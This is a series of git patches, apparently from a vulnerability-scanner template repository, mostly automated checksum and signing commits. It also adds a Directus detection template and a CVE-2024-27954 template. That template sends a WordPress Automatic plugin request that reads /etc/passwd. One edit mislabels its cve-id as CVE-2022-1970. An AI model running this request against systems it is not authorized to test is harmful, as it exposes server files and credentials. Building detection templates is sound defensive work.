workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 @@ -8215,7 +8215,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d -workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb +workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139 workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5 workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779 From a0315e64cb0bf97d4b4f465bc909d4dc81084fa1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:44:53 +0000 Subject: [PATCH 70/86] Auto Generated Templates Checksum [Fri Mar 22 07:44:53 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 05fe547af1..243017a1a9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3112,7 +3112,7 @@ http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b http/default-logins/aem/aem-felix-console.yaml:43658ba960762d06a5c8be673078e3049cb7e71f -http/default-logins/alibaba/canal-default-login.yaml:2c0e5475e64363fb8ec6f6748768c09a9da193de +http/default-logins/alibaba/canal-default-login.yaml:7c9308b40deec5c04c4f140ee21a5d7be7a24525 http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:85f803445c04e3767bca7543b712f870fbe8bc26 +templates-checksum.txt:3e2acfb1564de13ccdeacca4c94b6b4733ef0b79 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3fcda12c44c235e09586fd929c37fa60fbe28f71 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:46:39 +0000 Subject: [PATCH 71/86] Auto Template Signing [Fri Mar 22 07:46:39 UTC 2024] :robot: --- http/default-logins/alibaba/canal-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/alibaba/canal-default-login.yaml b/http/default-logins/alibaba/canal-default-login.yaml index e3f11bed1e..40cf08b22a 100644 --- a/http/default-logins/alibaba/canal-default-login.yaml +++ b/http/default-logins/alibaba/canal-default-login.yaml @@ -42,5 +42,4 @@ http: words: - 'data":{"token"' - '"code":20000' - -# digest: 4a0a004730450220126d880af62775003a5b6029ad39aead9272e2a61bdaab710e896acf665d7064022100caa03f9b85633bd64fce0925f23720ac678e539c93355165426ed68a982d820e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dcf09580a68dde8267efb45c71a519054938eaa0f8389934c19a69f945ecbd73022010071bf196c1b070ee79de3c48c4227e6834381e641b486b2059ace96d8257d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5341db94990d9b08e716f1be418130f89a868705 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Mar 2024 13:21:38 +0530 Subject: [PATCH 72/86] minor update --- http/technologies/directus-detect.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml index 91767c6618..1b70af7072 100644 --- a/http/technologies/directus-detect.yaml +++ b/http/technologies/directus-detect.yaml @@ -10,21 +10,18 @@ info: - https://directus.io/ metadata: max-request: 1 - google-query: intitle:directus "Not Authenticated" + google-query: 'X-Powered-By: Directus' verified: true tags: tech,directus,detect http: - method: GET - stop-at-first-match: true path: - "{{BaseURL}}" - host-redirects: true - max-redirects: 1 matchers: - type: word - case-insensitive: true part: header words: - "X-Powered-By: Directus" + case-insensitive: true From 6b95b67b09049c798dd163811d2330c2b2c77ffe Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 22 Mar 2024 21:03:04 +0530 Subject: [PATCH 73/86] Create CVE-2024-27954.yaml --- http/cves/2024/CVE-2024-27954.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/cves/2024/CVE-2024-27954.yaml diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml new file mode 100644 index 0000000000..523bf191fb --- /dev/null +++ b/http/cves/2024/CVE-2024-27954.yaml @@ -0,0 +1,30 @@ +id: CVE-2024-27954 + +info: + name: WordPress Automatic plugin - Arbitrary File Download and SSRF + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + Unauthenticated Arbitrary File Download and SSRF. Located in the downloader.php file, this vulnerability also discovered by Rafie Muhammad, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. Thankfully, this vulnerability too has been patched in version 3.92.1. + reference: + - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954 + tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf + +http: + - raw: + - | + GET /?p=1&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"link":"file:' + + - type: word + part: body + words: + - 'root:x:0:0:root:' From 0e6e1450ec9c762ad0776bf24081e7b296aa9049 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 22 Mar 2024 21:13:51 +0530 Subject: [PATCH 74/86] Update CVE-2024-27954.yaml --- http/cves/2024/CVE-2024-27954.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml index 523bf191fb..9f9c4505d4 100644 --- a/http/cves/2024/CVE-2024-27954.yaml +++ b/http/cves/2024/CVE-2024-27954.yaml @@ -1,14 +1,19 @@ id: CVE-2024-27954 info: - name: WordPress Automatic plugin - Arbitrary File Download and SSRF + name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF author: iamnoooob,rootxharsh,pdresearch severity: critical description: | - Unauthenticated Arbitrary File Download and SSRF. Located in the downloader.php file, this vulnerability also discovered by Rafie Muhammad, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. Thankfully, this vulnerability too has been patched in version 3.92.1. + WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1. reference: - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954 + classification: + cve-id: CVE-2024-27954 + metadata: + max-request: 1 + verified: true tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf http: From 2b09b301f44aa9d1c5b0e6cdd7dc17fcc0747791 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Mar 2024 21:20:43 +0530 Subject: [PATCH 75/86] added metadata --- http/cves/2024/CVE-2024-27954.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml index 9f9c4505d4..fb78070d09 100644 --- a/http/cves/2024/CVE-2024-27954.yaml +++ b/http/cves/2024/CVE-2024-27954.yaml @@ -14,7 +14,8 @@ info: metadata: max-request: 1 verified: true - tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf + publicwww-query: "/wp-content/plugins/wp-automatic/" + tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic http: - raw: From aa45bd2e0f11540d86a9ec7d26b9ffe4edd430fe Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 22 Mar 2024 21:22:57 +0530 Subject: [PATCH 76/86] updated matcher & info --- http/cves/2024/CVE-2024-27954.yaml | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml index fb78070d09..cd4f2864c7 100644 --- a/http/cves/2024/CVE-2024-27954.yaml +++ b/http/cves/2024/CVE-2024-27954.yaml @@ -7,21 +7,23 @@ info: description: | WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1. reference: + - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/ - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954 classification: - cve-id: CVE-2024-27954 + cvss-score: 9.8 + cwe-id: CWE-918 + cve-id: CVE-2022-1970 metadata: max-request: 1 verified: true - publicwww-query: "/wp-content/plugins/wp-automatic/" + publicwww-query: "/wp-content/plugins/wp-automatic" tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic http: - - raw: - - | - GET /?p=1&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd" matchers-condition: and matchers: @@ -30,7 +32,6 @@ http: words: - '"link":"file:' - - type: word - part: body - words: - - 'root:x:0:0:root:' + - type: regex + regex: + - "root:.*:0:0:" From be511088a6b2b35a13f42c009310064020022759 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 22 Mar 2024 16:05:42 +0000 Subject: [PATCH 77/86] Auto Generated New Template Addition List [Fri Mar 22 16:05:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 47df011d4e..31c093cbae 100644 --- a/.new-additions +++ b/.new-additions @@ -32,6 +32,7 @@ http/cves/2023/CVE-2023-5830.yaml http/cves/2023/CVE-2023-5914.yaml http/cves/2024/CVE-2024-1212.yaml http/cves/2024/CVE-2024-1698.yaml +http/cves/2024/CVE-2024-27954.yaml http/exposed-panels/bynder-panel.yaml http/exposed-panels/cisco/cisco-expressway-panel.yaml http/exposed-panels/emqx-panel.yaml From 680534f3d80ad4e5123576cff3559d8a7bff60e7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:05:58 +0000 Subject: [PATCH 78/86] Auto Generated Templates Checksum [Fri Mar 22 16:05:58 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 243017a1a9..9e9ecefa2c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3105,6 +3105,7 @@ http/cves/2024/CVE-2024-25735.yaml:bb8f329838a1758c223d85cdbe23c820f8b61640 http/cves/2024/CVE-2024-27198.yaml:c4f066c0332dea8b23c9aa0990baa6b6b5c806bb http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:5ee80d14253ccdeec8c2bdc1c7e82a8062b4f487 +http/cves/2024/CVE-2024-27954.yaml:3fba338e3ad021e3d3eece7077f1f221337b05ed http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 @@ -3112,7 +3113,7 @@ http/default-logins/activemq/activemq-default-login.yaml:d9c1716e5fab0e3cdd0ebaa http/default-logins/adminer-default-login.yaml:1dc0fbedf2bb856303230bf3c5be9f2ad1bf9f0e http/default-logins/aem/aem-default-login.yaml:932701c69be0aa181e7b40a5a6189ba34578015b http/default-logins/aem/aem-felix-console.yaml:43658ba960762d06a5c8be673078e3049cb7e71f -http/default-logins/alibaba/canal-default-login.yaml:7c9308b40deec5c04c4f140ee21a5d7be7a24525 +http/default-logins/alibaba/canal-default-login.yaml:53bee91e5473ba3be493bdb74fc8b2789b6f72fd http/default-logins/alphaweb/alphaweb-default-login.yaml:c70e96a6e9ed34b5fe721cc25c004aa4c66a59c9 http/default-logins/ambari/ambari-default-login.yaml:c7f2072fb639a02e718d877dcc7369f02f4a8cfe http/default-logins/apache/airflow-default-login.yaml:f4a72dcfe661dbfb227717d3201877b185af4d7b @@ -8176,7 +8177,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3e2acfb1564de13ccdeacca4c94b6b4733ef0b79 +templates-checksum.txt:8493340c3a7cf22d97222b000b5dfd83c2adb67c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2e8b3972266c8fcc15131b98e4131d45693ba7e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 22 Mar 2024 16:06:34 +0000 Subject: [PATCH 79/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9f93d3bc1e..91a891f6bf 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -37,6 +37,7 @@ on: - 'http/cves/2023/CVE-2023-5914.yaml' - 'http/cves/2024/CVE-2024-1212.yaml' - 'http/cves/2024/CVE-2024-1698.yaml' + - 'http/cves/2024/CVE-2024-27954.yaml' - 'http/exposed-panels/bynder-panel.yaml' - 'http/exposed-panels/cisco/cisco-expressway-panel.yaml' - 'http/exposed-panels/emqx-panel.yaml' From a211cb32de26a4dc3d0f1d304a8ac96e5c98ae28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:07:42 +0000 Subject: [PATCH 80/86] Auto Template Signing [Fri Mar 22 16:07:42 UTC 2024] :robot: --- http/cves/2024/CVE-2024-27954.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-27954.yaml b/http/cves/2024/CVE-2024-27954.yaml index cd4f2864c7..ea42f13279 100644 --- a/http/cves/2024/CVE-2024-27954.yaml +++ b/http/cves/2024/CVE-2024-27954.yaml @@ -35,3 +35,4 @@ http: - type: regex regex: - "root:.*:0:0:" +# digest: 4a0a00473045022100fe0fefeeca090cd190ad427541a138e93717d0eac2f27c00a2eec4bf5a63e30902202c2a3213ac5e28f8244ed547d1dd868bc948638e4cddaacee81de6d2f9422da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 40e9e20846384fa7fd7b072ae5594a9f7d80a7d1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 22 Mar 2024 16:07:58 +0000 Subject: [PATCH 81/86] Auto Generated New Template Addition List [Fri Mar 22 16:07:58 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 31c093cbae..bcdb3ae070 100644 --- a/.new-additions +++ b/.new-additions @@ -46,6 +46,7 @@ http/exposures/files/generic-db.yaml http/misconfiguration/installer/posteio-installer.yaml http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml +http/technologies/directus-detect.yaml http/technologies/microsoft/aspnet-version-detect.yaml http/technologies/microsoft/aspnetmvc-version-disclosure.yaml http/technologies/wing-ftp-service-detect.yaml From 7cb6746e68ba6f8e3455f0290e0107695039ecf2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:08:03 +0000 Subject: [PATCH 82/86] Auto Generated Templates Checksum [Fri Mar 22 16:08:03 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9e9ecefa2c..b909c5235f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6413,6 +6413,7 @@ http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edb http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367 http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a http/technologies/devexpress-detect.yaml:6a5327a8a84357f2e365da16936697859e0f6020 +http/technologies/directus-detect.yaml:6284abebab6cc1c447f02dd03c711303a4cdd22f http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431 http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99 http/technologies/dwr-index-detect.yaml:11ebf6bffb83d15af8cbca407b38fee3d67b72ab @@ -8177,7 +8178,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8493340c3a7cf22d97222b000b5dfd83c2adb67c +templates-checksum.txt:7d174505fe20e972aab2cdebc767e614166f25aa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cb61944fc741366088171f6b6912ad7a0a15f1e1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 22 Mar 2024 16:08:40 +0000 Subject: [PATCH 83/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 91a891f6bf..065d901ed1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -51,6 +51,7 @@ on: - 'http/misconfiguration/installer/posteio-installer.yaml' - 'http/osint/phishing/kakao-login-phish.yaml' - 'http/osint/phishing/naver-login-phish.yaml' + - 'http/technologies/directus-detect.yaml' - 'http/technologies/microsoft/aspnet-version-detect.yaml' - 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml' - 'http/technologies/wing-ftp-service-detect.yaml' From d97f1be11a32b0183307136ca5b83819b4db13c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:10:18 +0000 Subject: [PATCH 84/86] Auto Generated Templates Checksum [Fri Mar 22 16:10:18 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b909c5235f..e6c7f28525 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3105,7 +3105,7 @@ http/cves/2024/CVE-2024-25735.yaml:bb8f329838a1758c223d85cdbe23c820f8b61640 http/cves/2024/CVE-2024-27198.yaml:c4f066c0332dea8b23c9aa0990baa6b6b5c806bb http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:5ee80d14253ccdeec8c2bdc1c7e82a8062b4f487 -http/cves/2024/CVE-2024-27954.yaml:3fba338e3ad021e3d3eece7077f1f221337b05ed +http/cves/2024/CVE-2024-27954.yaml:d1056017d0cbf62dc6a2b0b6372ca2980992155c http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 @@ -7617,6 +7617,7 @@ http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:279bc487a6928ac8687f5e2e http/vulnerabilities/other/unauth-spark-api.yaml:d3205ad468e29b3fd6d59637db539399b1c93c64 http/vulnerabilities/other/unifi-network-log4j-rce.yaml:ab0f3c5c653a7406ee48d9a1ee0b1b810801c6db http/vulnerabilities/other/universal-media-xss.yaml:18afec046906e2afc3c2a1b9eee94e6fed1008e9 +http/vulnerabilities/other/ups-network-lfi.yaml:973370147cfb7fb529fd2c978f4900ccef9215af http/vulnerabilities/other/vanguard-post-xss.yaml:ebea3529277da89f92f263b4c2e01b1440ead349 http/vulnerabilities/other/viewlinc-crlf-injection.yaml:dc9df9a7e0f610a07fe7611c166ae358706450ce http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:e69e54fb6312bebd4dd9e111db93045fea6eedef @@ -8178,7 +8179,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7d174505fe20e972aab2cdebc767e614166f25aa +templates-checksum.txt:73085eb95bd53b989402733d6c0a2d505062e246 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 75aa75adc1c4b4a3d192b323b0ba9e0a2db33ff7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:11:18 +0000 Subject: [PATCH 85/86] Auto Generated Templates Checksum [Fri Mar 22 16:11:18 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e6c7f28525..0fdd4f57ac 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4116,6 +4116,7 @@ http/exposed-panels/skycaiji-admin-panel.yaml:361c2ff751869e4b694246e113ceaf3e0c http/exposed-panels/slocum-login.yaml:882558fc76eedef7ba2f13a9011a298046d85fe5 http/exposed-panels/smartping-dashboard.yaml:95eec001a41f2fe0c66ebfc58e0560cd9755e5cd http/exposed-panels/snapcomms-panel.yaml:2415e99a631ec5250f3f9be63e99f91d15d6f494 +http/exposed-panels/softether-vpn-panel.yaml:9c37a5f904da87f0cc892b4a675a6b50432e2708 http/exposed-panels/solarview-compact-panel.yaml:be95efca10dca1f6b755b1d7e6f91e4f77e0594f http/exposed-panels/solarwinds-arm-panel.yaml:2aaf482c52b633dfe17bad946cfed56da0282d0f http/exposed-panels/solarwinds-orion.yaml:d04c286187f0f4b310d767196124eead9bab0a89 @@ -8179,7 +8180,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:73085eb95bd53b989402733d6c0a2d505062e246 +templates-checksum.txt:608bfc81bcb7af107a327b22977799f2016e33a5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 005231adaaf49a8f841ea4aacd25c6bf0b2b0abf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 16:12:05 +0000 Subject: [PATCH 86/86] Auto Template Signing [Fri Mar 22 16:12:05 UTC 2024] :robot: --- http/technologies/directus-detect.yaml | 1 + http/vulnerabilities/other/ups-network-lfi.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml index 1b70af7072..2e01cf6172 100644 --- a/http/technologies/directus-detect.yaml +++ b/http/technologies/directus-detect.yaml @@ -25,3 +25,4 @@ http: words: - "X-Powered-By: Directus" case-insensitive: true +# digest: 490a004630440220479c02cfe34e7b2c20a1a976a14a53f0b1aafded106d55d08b9805cd3715425c02202a6fb91a2289a5fae5ff1ce56b8fef09bfcec164a5546e1ad4a8145584d5212b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/ups-network-lfi.yaml b/http/vulnerabilities/other/ups-network-lfi.yaml index 849a2a4d87..4ac9d89d60 100644 --- a/http/vulnerabilities/other/ups-network-lfi.yaml +++ b/http/vulnerabilities/other/ups-network-lfi.yaml @@ -35,3 +35,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100f89ac4d5fc64a14de49e8cb3c38e50b5639b4232cf5be0590f1bfdc1d4a6984f0220378dff779681382e54be7b3f7a240fff7417804e84cb9fc58c17e2c84cb04e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file